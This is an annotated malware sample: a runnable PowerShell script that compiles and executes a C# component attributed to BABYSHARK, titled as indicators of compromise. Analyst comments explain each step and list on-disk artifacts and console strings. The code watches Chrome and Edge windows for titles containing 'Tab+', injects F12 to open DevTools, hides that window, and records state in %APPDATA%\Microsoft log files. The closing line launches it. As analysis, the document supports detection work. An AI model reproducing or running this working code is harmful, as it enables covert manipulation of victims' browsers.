BABYSHARK malware indicators of compromise
Add-Type -TypeDefinition @"
using System;
using System.IO;
using System.Text;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace g1
{
// Analyst annotation of the BABYSHARK component embedded in this PowerShell gist.
// The code is left byte-for-byte as published; comments only describe what it does so the
// behaviour and its artifacts can be recognised. On-disk artifacts created by this class:
//   %APPDATA%\Microsoft\tabid_chrome.log and %APPDATA%\Microsoft\tabid_edge.log
// (';'-separated lists that always start with the sentinel "nowjohnstart").
// Runtime artifacts: a PowerShell process with user32 keybd_event/ShowWindow imports, and
// the console strings "exist tabid", "no exist tabid, click", "hide devtool",
// "BackgroundWindow's not Chrome.exe or Edge.exe".
public static class P1
{
// Never returns: enters while(1==1) below, whose only exit is an unhandled exception
// (e.g. Process.GetProcessById throws ArgumentException if the PID has already exited).
public static void M1()
{
//------------ chrome --------------
// Marker searched for (case-insensitively) in the foreground window title. Where this
// marker originates is not visible in this script.
string devsign = "Tab+";
// ';'-separated list of titles already handled; "nowjohnstart" is the sentinel first entry.
StringBuilder tabid_info_chrome = new StringBuilder("nowjohnstart");
// CSIDL 26 = CSIDL_APPDATA, so the state file resolves to %APPDATA%\Microsoft\tabid_chrome.log.
// SHGetFolderPath is documented to need a MAX_PATH (260) buffer; 250 is allocated here.
StringBuilder tabid_chrome_file = new StringBuilder("",250);
SHGetFolderPath(0,26 ,0,0,tabid_chrome_file);
tabid_chrome_file.Append("\\Microsoft\\tabid_chrome.log");
// State survives restarts: reload the handled-title list if the file already exists.
if(File.Exists(tabid_chrome_file.ToString()))
{
tabid_info_chrome.Clear();
tabid_info_chrome.Append(File.ReadAllText(tabid_chrome_file.ToString()));
}
//------------- edge ---------------
// Same setup for Edge, backed by %APPDATA%\Microsoft\tabid_edge.log.
StringBuilder tabid_info_edge = new StringBuilder("nowjohnstart");
StringBuilder tabid_edge_file = new StringBuilder("",250);
SHGetFolderPath(0,26 ,0,0,tabid_edge_file);
tabid_edge_file.Append("\\Microsoft\\tabid_edge.log");
if(File.Exists(tabid_edge_file.ToString()))
{
tabid_info_edge.Clear();
tabid_info_edge.Append(File.ReadAllText(tabid_edge_file.ToString()));
}
// Main loop: polls the foreground window indefinitely.
while(1==1)
{
//------------- chrome ---------------
// When no chrome.exe process remains, forget the handled titles and remove the state
// file (File.Delete does not throw if the file is already absent).
if(Process.GetProcessesByName("chrome").Length == 0)
{
tabid_info_chrome.Clear();
tabid_info_chrome.Append("nowjohnstart");
File.Delete(tabid_chrome_file.ToString());
}
//------------- edge ---------------
// Edge is checked under both its Chromium ("msedge") and legacy ("microsoftedge") names.
if(Process.GetProcessesByName("msedge").Length == 0)
{
if(Process.GetProcessesByName("microsoftedge").Length == 0)
{
tabid_info_edge.Clear();
tabid_info_edge.Append("nowjohnstart");
File.Delete(tabid_edge_file.ToString());
}
}
IntPtr hWnd = IntPtr.Zero;
hWnd = GetForegroundWindow();
// No Sleep on this path: with no foreground window the loop spins without pausing.
if (hWnd == IntPtr.Zero)
{
continue;
}
// Resolve the process owning the foreground window; nothing catches a failure here.
uint PID;
GetWindowThreadProcessId(hWnd,out PID);
Process pp = Process.GetProcessById((int)PID);
string processpath = pp.ProcessName;
// Window title, truncated to 256 characters.
StringBuilder title = new StringBuilder(256);
GetWindowText(hWnd, title, 256);
// Branch 1: foreground window belongs to Chrome and its title does not already contain "devtools".
if((processpath.ToString().ToLower() == "chrome") && (title.ToString().ToLower().IndexOf("devtools") == -1))
{
// The title is re-read here although it was read just above.
title.Clear();
GetWindowText(hWnd, title, 256);
bool dev_click_flag = false;
// Act only on titles that contain the marker and have not been seen before, i.e. no
// recorded entry is a substring of the current title.
if(title.ToString().ToLower().IndexOf(devsign.ToLower()) != -1)
{
dev_click_flag = true;
foreach(string tabid in tabid_info_chrome.ToString().Split(';'))
{
if(title.ToString().ToLower().IndexOf(tabid.ToLower()) != -1)
{
dev_click_flag = false;
Console.WriteLine("exist tabid");
break;
}
}
}
if(dev_click_flag == true)
{
Console.WriteLine("no exist tabid, click");
dev_click_flag = false;
// Record the title from the marker onward and rewrite the whole list to the state file.
int john_strpos = title.ToString().ToLower().IndexOf(devsign.ToLower());
tabid_info_chrome.Append(';' + title.ToString().Substring(john_strpos));
using (StreamWriter logFile = File.CreateText(tabid_chrome_file.ToString()))
{
logFile.Write(tabid_info_chrome);
}
//PostMessage(hWnd, (int)0x100, (IntPtr)0x7B, (IntPtr)0);
// Injects an F12 key press into the input queue (0x7B = VK_F12; flags 0 = key down,
// 2 = KEYEVENTF_KEYUP). The poll below expects a window titled "devtools" to appear.
keybd_event((byte)0x7b, 0, (int)(0), 0);
Sleep(10);
keybd_event((byte)0x7b, 0, (int)(2), 0);
//PostMessage(hWnd, (int)0x101, (IntPtr)0x7B, (IntPtr)0);
// Poll the foreground window for up to 700 x 10 ms (~7 s). When its title contains
// "devtools", hide that window (ShowWindow nCmdShow 0 = SW_HIDE), pause 1.5 s and stop.
// The times = 0 reset is redundant: dev_flag = false already ends the loop.
int times = 0;
bool dev_flag = true;
while((dev_flag == true)&&(times < 700))
{
IntPtr hWnd_dev = GetForegroundWindow();
StringBuilder title_dev = new StringBuilder(256);
GetWindowText(hWnd_dev, title_dev, 256);
if(title_dev.ToString().ToLower().IndexOf("devtools") != -1)
{
Console.WriteLine("hide devtool");
ShowWindow(hWnd_dev, 0);
dev_flag = false;
times = 0;
Sleep(1500);
}
Sleep(10);
times = times + 1;
}
}
Sleep(10);
}
// Branch 2: Edge (Chromium "msedge", legacy "microsoftedge", or its UWP host
// "applicationframehost") without "devtools" in the title. Logic mirrors the Chrome
// branch, using the Edge list and state file.
else if((processpath.ToString().ToLower() == "applicationframehost" || processpath.ToString().ToLower() == "microsoftedge" || processpath.ToString().ToLower() == "msedge") && (title.ToString().ToLower().IndexOf("devtools") == -1))
{
title.Clear();
GetWindowText(hWnd, title, 256);
bool dev_click_flag = false;
if(title.ToString().ToLower().IndexOf(devsign.ToLower()) != -1)
{
dev_click_flag = true;
foreach(string tabid in tabid_info_edge.ToString().Split(';'))
{
if(title.ToString().ToLower().IndexOf(tabid.ToLower()) != -1)
{
dev_click_flag = false;
Console.WriteLine("exist tabid");
break;
}
}
}
if(dev_click_flag == true)
{
Console.WriteLine("no exist tabid, click");
dev_click_flag = false;
int john_strpos = title.ToString().ToLower().IndexOf(devsign.ToLower());
tabid_info_edge.Append(';' + title.ToString().Substring(john_strpos));
using (StreamWriter logFile = File.CreateText(tabid_edge_file.ToString()))
{
logFile.Write(tabid_info_edge);
}
//PostMessage(hWnd, (int)0x100, (IntPtr)0x7B, (IntPtr)0);
// Same F12 down/up injection as the Chrome branch.
keybd_event((byte)0x7b, 0, (int)(0), 0);
Sleep(10);
keybd_event((byte)0x7b, 0, (int)(2), 0);
//PostMessage(hWnd, (int)0x101, (IntPtr)0x7B, (IntPtr)0);
// Same ~7 s poll-and-hide loop as the Chrome branch.
int times = 0;
bool dev_flag = true;
while((dev_flag == true)&&(times < 700))
{
IntPtr hWnd_dev = GetForegroundWindow();
StringBuilder title_dev = new StringBuilder(256);
GetWindowText(hWnd_dev, title_dev, 256);
if(title_dev.ToString().ToLower().IndexOf("devtools") != -1)
{
Console.WriteLine("hide devtool");
ShowWindow(hWnd_dev, 0);
dev_flag = false;
times = 0;
Sleep(1500);
}
Sleep(10);
times = times + 1;
}
}
Sleep(10);
}
// Any other foreground process: idle for 3 s before polling again.
else
{
Sleep(3000);
Console.WriteLine("BackgroundWindow's not Chrome.exe or Edge.exe");
}
}
}
// Win32 imports. FindWindow, GetClassName and PostMessage are declared but never called by
// the code above (PostMessage appears only in commented-out lines). Sleep is the blocking
// kernel32 call, not Thread.Sleep.
[DllImport("user32.dll")]static extern bool ShowWindow(IntPtr hW,int nC);
[DllImport("kernel32")]public static extern void Sleep(uint dM);
[DllImport("User32.dll")]public static extern int FindWindow(string sC,string sW);
[DllImport("user32.dll", CharSet = CharSet.Auto)]public static extern int GetWindowText(IntPtr hWnd, StringBuilder title, int size);
[DllImport("user32.dll")]public static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]public static extern int GetClassName(IntPtr hWnd, StringBuilder lpClassName, int nMaxCount);
[DllImport("user32.dll")]public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
[DllImport("user32.dll")]public static extern bool PostMessage(IntPtr WindowHandle, int Msg, IntPtr wParam, IntPtr lParam);
[DllImport("User32.dll")]
public static extern void keybd_event(byte vk, byte scan, int flags, int extra);
// Declared with uint for the HWND/HANDLE parameters; only zeros are ever passed above.
[DllImport("shell32.dll")]
public static extern uint SHGetFolderPath(uint hwnd, uint csidl, uint hToken,uint dwFlags,System.Text.StringBuilder pszSubDir);
}
}
"@ -ReferencedAssemblies System.Windows.Forms;
# Entry point: the here-string above is compiled in-process by Add-Type, then M1 is called.
# M1 runs while(1==1) and never returns, so the PowerShell host stays resident from here on.
[g1.P1]::M1();